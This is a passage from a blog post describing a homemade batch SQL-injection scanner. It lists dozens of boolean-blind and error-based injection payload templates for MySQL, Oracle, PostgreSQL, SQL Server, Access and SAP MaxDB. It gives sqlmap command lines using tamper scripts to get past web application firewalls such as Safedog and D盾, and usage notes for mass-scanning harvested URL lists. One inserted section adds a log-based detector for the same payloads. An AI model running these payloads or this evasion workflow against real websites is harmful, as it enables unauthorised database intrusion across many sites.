         'payload': ' AND ([RANDNUM]=[RANDNUM])*[RANDNUM1]', 'level': '1'},
    "INJPAY_16":
        {
            'comparsion': ' OR (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL',
            'dbms': 'Oracle',
            'payload': ' OR (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL',
            'level': '2'},
    "INJPAY_17":
        {
            'comparsion': ' and (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))',
            'dbms': 'MySQL',
            'payload': ' and (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))',
            'level': '3'},
    "INJPAY_14":
        {
            'comparsion': " OR (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL",
            'dbms': 'PostgreSQL',
            'payload': " OR (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL",
            'level': '2'},
    "INJPAY_15":
        {
            'comparsion': ' AND (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL',
            'dbms': 'Oracle',
            'payload': ' AND (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL',
            'level': '1'},
    "INJPAY_18":
        {'comparsion': ' and MAKE_SET([RANDNUM]=[RANDNUM1],[ORIGVALUE])', 'dbms': 'MySQL',
         'payload': ' and MAKE_SET([RANDNUM]=[RANDNUM],[ORIGVALUE])', 'level': '3'},
    "INJPAY_19":
        {'comparsion': ' and ELT([RANDNUM]=[RANDNUM1],[RANDNUM1])', 'dbms': 'MySQL',
         'payload': ' and ELT([RANDNUM]=[RANDNUM],[RANDNUM1])', 'level': '3'},
    "INJPAY_52":
        {'comparsion': ' ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)',
         'dbms': 'PostgreSQL',
         'payload': ' ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)', 'level': '1'},
    "INJPAY_56":
        {
            'comparsion': ' ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL',
            'dbms': 'Oracle',
            'payload': ' ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL',
            'level': '1'},
    "INJPAY_57":
        {'comparsion': ' ;IIF([RANDNUM]=[RANDNUM1],1,1/0)', 'dbms': 'Microsoft Access',
         'payload': ' ;IIF([RANDNUM]=[RANDNUM],1,1/0)', 'level': '1'},
    "INJPAY_54":
        {'comparsion': ' ;IF([RANDNUM]=[RANDNUM1]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]',
         'dbms': 'Microsoft SQL Server',
         'payload': ' ;IF([RANDNUM]=[RANDNUM]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]', 'level': '1'},
    "INJPAY_1":
        {'comparsion': ' AND [RANDNUM]=[RANDNUM1]', 'dbms': 'MySQL', 'payload': ' AND [RANDNUM]=[RANDNUM]',
         'level': '1'},
    "INJPAY_2":
        {'comparsion': ' OR [RANDNUM]=[RANDNUM1]', 'dbms': 'MySQL', 'payload': ' OR [RANDNUM]=[RANDNUM]', 'level': '2'},
    "INJPAY_3":
        {'comparsion': ' OR NOT [RANDNUM]=[RANDNUM1]', 'dbms': 'MySQL', 'payload': ' OR NOT [RANDNUM]=[RANDNUM]',
         'level': '1'},
    "INJPAY_4":
        {'comparsion': ' AND [RANDNUM]=[RANDNUM1]', 'dbms': 'Microsoft Access', 'payload': ' AND [RANDNUM]=[RANDNUM]',
         'level': '1'},
    "INJPAY_5":
        {'comparsion': ' OR [RANDNUM]=[RANDNUM1]', 'dbms': 'Microsoft Access', 'payload': ' OR [RANDNUM]=[RANDNUM]',
         'level': '2'},
    "INJPAY_6":
        {'comparsion': ' RLIKE (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 0x28 END))',
         'dbms': 'MySQL', 'payload': ' RLIKE (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 0x28 END))',
         'level': '1'},
    "INJPAY_7":
        {'comparsion': ' AND MAKE_SET([RANDNUM]=[RANDNUM1],[RANDNUM1])', 'dbms': 'MySQL',
         'payload': ' AND MAKE_SET([RANDNUM]=[RANDNUM],[RANDNUM1])', 'level': '1'},
    "INJPAY_8":
        {'comparsion': ' OR MAKE_SET([RANDNUM]=[RANDNUM1],[RANDNUM1])', 'dbms': 'MySQL',
         'payload': ' OR MAKE_SET([RANDNUM]=[RANDNUM],[RANDNUM1])', 'level': '2'},
    "INJPAY_9":
        {'comparsion': ' AND ELT([RANDNUM]=[RANDNUM1],[RANDNUM1])', 'dbms': 'MySQL',
         'payload': ' AND ELT([RANDNUM]=[RANDNUM],[RANDNUM1])', 'level': '1'},
    "INJPAY_53":
        {
            'comparsion': ' ;SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1',
            'dbms': 'PostgreSQL',
            'payload': ' ;SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1',
            'level': '1'},
    "INJPAY_49":
        {'comparsion': ' ,(CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE NULL END)', 'dbms': 'SAP MaxDB',
         'payload': ' ,(CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE NULL END)', 'level': '1'},
    "INJPAY_48":
        {'comparsion': ' ,(CASE WHEN [RANDNUM]=[RANDNUM1] THEN 1 ELSE NULL END)', 'dbms': 'SAP MaxDB',
         'payload': ' ,(CASE WHEN [RANDNUM]=[RANDNUM] THEN 1 ELSE NULL END)', 'level': '1'},
    "INJPAY_45":
        {
            'comparsion': ' ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)',
            'dbms': 'Oracle',
            'payload': ' ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)',
            'level': '1'},
    "INJPAY_44":
        {
            'comparsion': ' ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)',
            'dbms': 'Oracle',
            'payload': ' ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)',
            'level': '1'},
    "INJPAY_47":
        {'comparsion': ' ,IIF([RANDNUM]=[RANDNUM1],[ORIGVALUE],1/0)', 'dbms': 'Microsoft Access',
         'payload': ' ,IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0)', 'level': '1'},
    "INJPAY_46":
        {'comparsion': ' ,IIF([RANDNUM]=[RANDNUM1],1,1/0)', 'dbms': 'Microsoft Access',
         'payload': ' ,IIF([RANDNUM]=[RANDNUM],1,1/0)', 'level': '1'},
    "INJPAY_41":
        {
            'comparsion': ' ,(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1)',
            'dbms': 'PostgreSQL',
            'payload': ' ,(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)',
            'level': '1'},
    "INJPAY_40":
        {'comparsion': ' ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))',
         'dbms': 'PostgreSQL',
         'payload': ' ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))',
         'level': '1'},
    "INJPAY_43":
        {
            'comparsion': ' ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))',
            'dbms': 'Microsoft SQL Server',
            'payload': ' ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))',
            'level': '1'},
    "INJPAY_42":
        {
            'comparsion': ' ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))',
            'dbms': 'Microsoft SQL Server',
            'payload': ' ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))',
            'level': '1'}
}
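Both the two-step error-based check and the boolean-blind templates above leave a recognisable shape in web-server logs: a numeric tautology inside CASE WHEN / ELT / GENERATE_SERIES and friends, and, for the blind dict, a true form (payload) followed by its false twin (comparsion) in which only the second number changes. The detector below is an added example, not code from Langzi_SQL_INJECTION or sqlmap; it runs those shapes over constructed Common Log Format lines and pairs payload/comparsion twins. The log lines, the path /news.php and the parameter id are made up.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Structural fragments that survive once [RANDNUM]/[ORIGVALUE] are substituted in the
# templates above; a hit on any of them marks a parameter value as probe-like.
PROBE_PATTERNS = [(name, re.compile(rx, re.IGNORECASE)) for name, rx in (
    ("case_when_numeric", r"\bCASE\s+WHEN\s*\(?\s*\d+\s*=\s*\d+\s*\)?\s*THEN\b"),
    ("generate_series", r"\bGENERATE_SERIES\s*\("),
    ("elt_makeset_iif", r"\b(?:ELT|MAKE_SET|IIF)\s*\(\s*\d+\s*=\s*\d+"),
    ("convert_int", r"\bCONVERT\s*\(\s*INT\s*,"),
    ("oracle_ctxsys", r"\bCTXSYS\.DRITHSX\.SN\b"),
    ("mysql_plugins", r"\bINFORMATION_SCHEMA\.PLUGINS\b"),
    ("informix_sysdual", r"\bSYSMASTER:SYSDUAL\b"),
    ("div_by_select_zero", r"\b1\s*/\s*\(\s*SELECT\s+0\s*\)"),
    ("bare_tautology", r"\b(?:AND|OR|HAVING)\s+(?:NOT\s+)?\d+\s*=\s*\d+\s*$"),
)]
COMPARISON = re.compile(r"\b(\d+)\s*=\s*(\d+)\b")
# Common Log Format: client, identd, user, [time], "METHOD target PROTO", status, size
LOG_RE = re.compile(r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) '
                    r'(?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+$')

# Constructed sample traffic (not real logs): a baseline request, a bare AND n=n / n=n+1
# twin, a PostgreSQL-style CASE WHEN twin (INJPAY_39 shape) and one benign search.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /news.php?id=1 HTTP/1.1" 200 5120
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /news.php?id=1%20AND%204971%3D4971 HTTP/1.1" 200 5120
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /news.php?id=1%20AND%204971%3D4972 HTTP/1.1" 200 1830
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /news.php?id=1%20and%20(SELECT%20(CASE%20WHEN%20(8812%3D8812)%20THEN%201%20ELSE%201/(SELECT%200)%20END)) HTTP/1.1" 200 5120
10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /news.php?id=1%20and%20(SELECT%20(CASE%20WHEN%20(8812%3D8813)%20THEN%201%20ELSE%201/(SELECT%200)%20END)) HTTP/1.1" 500 612
10.0.0.9 - - [01/Jan/2024:10:00:06 +0000] "GET /search.php?q=case+when+to+use+then HTTP/1.1" 200 9001
"""

def classify_value(value):
    """Names of the probe patterns found in one URL-decoded parameter value."""
    return sorted(name for name, rx in PROBE_PATTERNS if rx.search(value))

def comparison_truth(value):
    """Truth of the first numeric a=b comparison in the value, or None if there is none."""
    m = COMPARISON.search(value)
    return None if m is None else int(m.group(1)) == int(m.group(2))

def analyse(log_text):
    """Scan CLF lines and return (hits, pairs): hits lists (client, path, param, names) for
    each probe-like value; pairs lists (client, path, param, shape) where one client sent
    both the true form (payload) and the false form (comparsion) of one template."""
    hits, seen = [], defaultdict(set)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path, query = urlsplit(m["target"])[2:4]
        for param, value in parse_qsl(query, keep_blank_values=True):
            names = classify_value(value)
            if not names:
                continue
            hits.append((m["client"], path, param, names))
            truth = comparison_truth(value)
            if truth is not None:
                # Replace every number so payload and comparsion collapse to one shape.
                shape = re.sub(r"\d+", "N", value)
                seen[(m["client"], path, param, shape)].add(truth)
    pairs = [key for key, truths in seen.items() if truths == {True, False}]
    return hits, pairs
```

A single probe-like hit may be a legitimate query; a payload/comparsion pair from one client against one parameter is the stronger signal and the one worth alerting on.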

Usage

Collect some URLs and put them in a text file.

Double-click to start the main program and follow the prompts:

1. Import the collected text file
2. Set the scan level
3. Set the number of processes

Scan levels:

level 1 : simple error-based GET/POST injection test
level 2 : slightly more complex error-page-based GET/POST injection test
level 3 : complex error-page-based GET/POST injection test
level 4 : complex boolean-based GET/POST blind injection test

The default level is 1. Note that the levels are cumulative: setting level=4 also runs the three levels before it, not only the [complex boolean-based GET/POST blind injection test]; setting level 2, for example, runs both the [simple error-based GET/POST injection test] and the [slightly more complex error-page-based GET/POST injection test].

Results are saved automatically to result.txt in the current directory.

The interface is very bare: no coloured output was added, and results are simply written to result.txt rather than to a timestamped, nicely formatted HTML file.

The reason is simple: this 2.0 is really just the injection-detection plugin from Langzi_Api, extracted into a standalone program for batch scanning URLs.

Union-based injection will be added later, and the original code will certainly need optimising, because loading this many payloads takes a long time. For now the framework is in place.

Langzi_SQL_INJECTION_3.2

Development notes

Some guys in the group reported lots of false positives, and added that lots of false positives is perfectly normal, which really hurt. So I got a buzz cut, knuckled down and released version 3.2: instead of porting parts of the functionality, it wraps sqlmap directly into a pipeline, achieving 100% verification success.

  1. Plain injection test
  2. POST and cookie injection test
  3. Simple test with a tamper script loaded
  4. POST and cookie test with a tamper script loaded
  5. High-level test with a tamper script loaded, random request headers and other tweaks
  6. Run all of the above checks together, stopping as soon as one of them returns a successful injection result.

  1. sqlmap.py -u url --batch
  2. sqlmap.py -u url --batch --cookie 'id=1' --level=2
  3. sqlmap.py -u url --batch --tamper=killdog.py
  4. sqlmap.py -u url --batch --cookie 'id=1' --level=2 --tamper='killdog.py'
  5. sqlmap.py -u url --batch --tamper=killdog.py --delay 2 --time-sec=15 --timeout=20 --level 5 --risk 3 --random-agent

A stripped-down 32-bit Python 2.7 plus sqlmap 1.2.11.6 comes to 50 MB in total; with the original files, 60 MB...

Instructions

Collect some URLs and put them in any text file you like; with or without http is fine.

Then start the main program, drag the text file in, set the scan level and the number of processes, and wait for the results....

The tamper script in use is located at

F:\CODE\Langzi_Api\GET_SQL\lib\sqlmap\tamper\space2comment.py

To change the script, simply replace the contents of space2comment.py.

It can be swapped for a tamper aimed at Safedog, D盾 and the like.

A log file and the successful results are generated in the current directory. The log shows the sqlmap injection process and commands as well as any exceptions; the result file is concise and readable, and I feel it could be copied, lightly edited and submitted to a vulnerability platform directly.

The returned results, generated automatically in result.txt, look like this:

Langzi_SQL_INJECTION_3.3

Updates:

  1. tamper updated; gets past the low-end series of Safedog and D盾
  2. generated results are more concise and readable
  3. supports scanning dynamic links and pseudo-static pages

The generated results are smarter.

Langzi_SQL_INJECTION_3.7

The generated results are more detailed.

Langzi_SQL_INJECTION_3.8 final version

Slightly revised the results page; barring surprises, there will be no further updates.


Copyright notice

LangZi_Blog's by Jy Xie (浪子LangZi) is licensed under a Creative Commons BY-NC-ND 4.0 International License.
This article was first published on the Langzi_Blog's blog ( http://langzi.fun ). All rights reserved; infringement will be pursued.
